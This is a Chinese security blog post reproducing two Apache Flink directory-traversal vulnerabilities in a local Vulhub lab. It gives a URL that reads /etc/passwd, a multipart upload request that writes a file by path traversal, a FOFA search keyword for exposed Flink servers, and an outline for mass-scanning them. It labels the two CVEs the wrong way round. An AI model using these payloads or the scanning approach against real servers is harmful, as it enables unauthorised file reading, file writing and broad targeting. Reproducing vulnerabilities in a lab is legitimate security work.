Apache Flink目录遍历漏洞(REST API读/写远程文件)

 微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

CVE-2020-17518复现

0x01 漏洞描述

Apache Flink目录遍历漏洞,可通过REST API读/写远程文件

0x02 影响版本

Flink 1.5.1-1.11.2

0x03 复现过程

  1. 通过Vulhub复现:

下载链接:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

用dcker-cmose配置关环境docker-compose

2. 使用docker-compose配置相关环境docker-compose up -d

3. 运行docker ps查看当前环境

4. 浏览器访问http://127.0.0.1:8081/

5. 构造exp:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

6. 清理环境

docker-compose down

0x04 fofa关键字

app="APACHE-Flink"

CVE-2020-17519复现

0x05 构造数据包

复现步骤与18相同,直接构造数据包
 

POST /jars/upload HTTP/1.1
Host: 127001:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187


------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"


success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

返回400

直接访问:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

0x06 修复建议

直接升级到安全版本 Flink 1.11.3或Flink 1.12.0

0x07 批量脚本编写思路

  1. 先fofa+shodan刷一波,去重

  2. 构造相关exp脚本进行测试即可

  3. 脚本构造很简单,基本没啥难度,在这里就不提供了,太忙了

    主要还是懒

微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值